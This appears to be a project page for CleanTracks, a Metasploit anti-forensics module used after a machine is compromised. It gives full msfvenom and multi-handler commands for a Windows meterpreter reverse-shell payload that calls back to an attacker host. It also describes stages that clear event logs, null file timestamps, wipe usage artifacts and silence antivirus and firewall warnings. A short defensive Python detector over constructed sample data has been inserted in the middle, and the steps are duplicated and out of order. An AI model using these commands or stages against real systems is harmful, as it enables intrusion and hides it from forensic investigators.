:[ how to Download/Use it ]:
2º port the auxiliary module to [ modules/auxiliary/analyze ] in the metasploit directory
[kali linux example]:
/usr/share/metasploit-framework/modules/auxiliary/analyze/CleanTracks.rb
[ubuntu linux example]:
/opt/metasploit/apps/pro/msf3/modules/auxiliary/analyze/CleanTracks.rb
4º build a windows meterpreter payload to test the module
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 --platform windows -f exe -o payload.exe
"Send payload.exe to the target using any method of your choice"
5º start a multi-handler
msfconsole -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.69; set LPORT 666; exploit'
"execute payload.exe on the target system with admin privs (execute as administrator)"
[ CleanTracks - Anti-forensics auxiliary ]
Version: 1.9 Author: pedr0 Ubuntu [ r00t-3xp10it ]
Hosted By: peterubuntu10[at]sourceforge[dot]net
http://sourceforge.net/projects/msf-auxiliarys/
https://sourceforge.net/p/msf-auxiliarys/repository/ci/master/tree/CleanTracks.rb
:[ Auxiliary Module History ]:
As a long-time metasploit framework user I realized that the current database does not contain any module that covers your tracks efficiently (against a forensic data-breach investigation) after a successful exploitation. Looking at the current database we can find only two 'meterpreter' modules that help with this task: 'clearev', which clears the Application, System and Security logs on a Windows system (event viewer), and 'timestomp', which manipulates the MACE (Modified, Accessed, Changed) times of a file/application (windows)...
But from a forensic point of view there are many more 'artifacts' left in the system that help investigators understand what steps we have taken: windowsir.blogspot/2013/07-howto-determine-user-access-to-files . After a quick reading we can understand that most 'artifacts' are found in the registry, .LNK files, browser history, prefetch files (.pf), RecentDocs, ShellBags, Temp/Recent and in logfiles (.log|.tmp|.lnk) spread all over the system; for that reason I decided to write this anti-forensics post-exploitation module.
:[ proof of concept ]:
The CleanTracks.rb auxiliary was written to work in post-exploitation (after the target gets exploited and a meterpreter session pops up); it relies on policy registry keys and cmd commands (executed remotely by the auxiliary) to prevent/cover footprints left on the target system.
PREVENT: prevents the creation of data (footprints) on the target system by adding registry policy keys into the target registry. "This option should be run just after a successful exploitation"..
CLEANER: clears temp/prefetch folders, flushes the DNS cache, clears event logs, shellbags, lnk, tmp, dat, etc. This option should be run before leaving the current session...
DEL_LOGS: 'clearev' (meterpreter API call) gives us the ability to clear all event viewer log files, just like the clearev metasploit command does.
GET_SYS: getprivs (API call) to elevate the current session to nt authority/system; it is advised to run it before running any of the stages described above.
DIR_MACE: blanks the MACE values in the target directory given as input; this option will change the MACE attributes of all files inside the selected directory to null values..
REVERT: reverts registry policies to their default values; this option will reverse all registry keys added by the CleanTracks.rb 'set prevent true' option.
LOGOFF: logs off the target machine (optional, more effective).
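Seen from the investigator's side, each of these stages leaves a trace of its own. The Python below is an added example, not part of CleanTracks.rb or of this page: it flags two such traces over constructed sample data. A cleared event log is itself recorded by Windows (Event ID 1102 in the Security channel, Event ID 104 in System and Application), and MACE values set to "null" show up as the zero FILETIME, which renders as 1601-01-01T00:00:00Z. The event records, file listing, field names and the payload.exe path are all constructed for the example.

```python
"""Added example (not part of CleanTracks.rb): detect two of the traces that
log clearing and MACE blanking leave behind, over constructed sample data."""
from datetime import datetime, timezone

# Constructed sample: simplified Windows event records (one dict per event).
SAMPLE_EVENTS = [
    {"Channel": "Security", "EventID": 4624, "Time": "2016-08-30T10:00:00Z",
     "User": "WORKSTATION\\alice"},
    {"Channel": "Security", "EventID": 1102, "Time": "2016-08-30T10:05:12Z",
     "User": "NT AUTHORITY\\SYSTEM"},
    {"Channel": "System", "EventID": 104, "Time": "2016-08-30T10:05:13Z",
     "User": "NT AUTHORITY\\SYSTEM"},
    {"Channel": "Application", "EventID": 104, "Time": "2016-08-30T10:05:13Z",
     "User": "NT AUTHORITY\\SYSTEM"},
    {"Channel": "System", "EventID": 7036, "Time": "2016-08-30T10:06:00Z",
     "User": ""},
]

# Windows records a cleared log with 1102 (Security) or 104 (other channels).
LOG_CLEARED = {("Security", 1102), ("System", 104), ("Application", 104)}


def find_log_clears(events):
    """Return (time, channel, user) for every event that records a cleared log."""
    return [(e["Time"], e["Channel"], e["User"])
            for e in events
            if (e["Channel"], e["EventID"]) in LOG_CLEARED]


# A FILETIME of zero renders as 1601-01-01T00:00:00Z; blanked MACE values look like this.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_ts(s):
    """Parse an ISO-8601 timestamp with a trailing 'Z' into an aware datetime."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


# Constructed sample: a file listing with its MACE-style timestamps.
SAMPLE_FILES = [
    {"path": r"C:\Users\alice\Documents\report.docx",
     "modified": "2016-08-29T15:22:10Z", "accessed": "2016-08-30T09:58:01Z",
     "created": "2016-08-20T08:00:00Z"},
    {"path": r"C:\Users\alice\Downloads\payload.exe",
     "modified": "1601-01-01T00:00:00Z", "accessed": "1601-01-01T00:00:00Z",
     "created": "1601-01-01T00:00:00Z"},
]


def find_blanked_mace(files):
    """Return (path, [fields]) for files where any timestamp is the zero FILETIME.

    A file that genuinely dates from 1601 cannot exist, so any such value is a
    strong sign that the timestamps were overwritten rather than recorded.
    """
    hits = []
    for f in files:
        blanked = [k for k in ("modified", "accessed", "created")
                   if parse_ts(f[k]) == FILETIME_EPOCH]
        if blanked:
            hits.append((f["path"], blanked))
    return hits


if __name__ == "__main__":
    for when, channel, user in find_log_clears(SAMPLE_EVENTS):
        print(f"{when} {channel} log cleared by {user}")
    for path, fields in find_blanked_mace(SAMPLE_FILES):
        print(f"{path}: zero FILETIME in {', '.join(fields)}")
```

Both checks key on what the covering action itself produces rather than on what it removes: a log that has been cleared still announces the clearing, and a timestamp that has been nulled is recognisable precisely because no real file carries it.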
[ MODULE ERROR REPORTS ]
New metasploit releases have changed the class name to 'MetasploitModule', so
if you are seeing this display it means that your metasploit is using an old class name.
To fix this display just edit one of the metasploit modules and check what class name
your version is using, then replace the (class MetasploitModule) in my module...
:[ registry policies keys used ]:
Disable updating of Accessed attributes in file/folder properties (MACE)
Clear the list of most recent commands that have been used (RUN)
Prevent the system from remembering the programs run.
Detect application installations and prompt for elevation (UAC)
Prevent regedit.exe from displaying the last key accessed (REG)
No entry of recently accessed documents in Recent Documents.
Disable all most-frequently-used programs from the Start menu.
Empty temporary Internet files on exiting Internet Explorer.
Delete the list of recently used documents on logoff
Hide the recently used files drop-down field inside dialogs
Delete the pagefile during the shutdown process.
Don't store open application names (MUICache)
Erase entries in the command history list (CMD)
Delete the list of computers associated with on a LAN
At logoff, delete the local copy of users' offline files
Disable security center warning of antivirus.
Disable security center warning of firewall.
Clear internet URL history (days to keep)
Delete last sitename accessed (REG)
Delete the table of programs executed
Delete content indexing
:[ how to Download/Use it ]:
1º download the auxiliary module
2º port the auxiliary module to [ modules/auxiliary/analyze ] in the metasploit directory
3º start the metasploit and postgresql services
4º build a windows meterpreter payload to test the module
5º start a multi-handler
6º load/use the auxiliary
:[ Final notes ]:
This project is under development and any collaborative help in improving it will be much appreciated, like the inclusion of more 'artifact locations' or 'registry keys' to prevent the creation of data in the first place. More info about forensic windows investigation here: fireeye.com-threat-research
magnetforensics.com-forensic-analysis-of-lnk-files
Forensic Focus - Analysis Of The Windows Registry
windowsir.blogspot-howto-determine-user-access-to-files
Special thanks to: Betto Avalos [debugging],
Chaitanya [debugging], Spirit [debugging]
Suspicious Shell Activity - RedTeam develop @2016
Last edit: pedro ubuntu 2016-08-30
great ...
have fun ..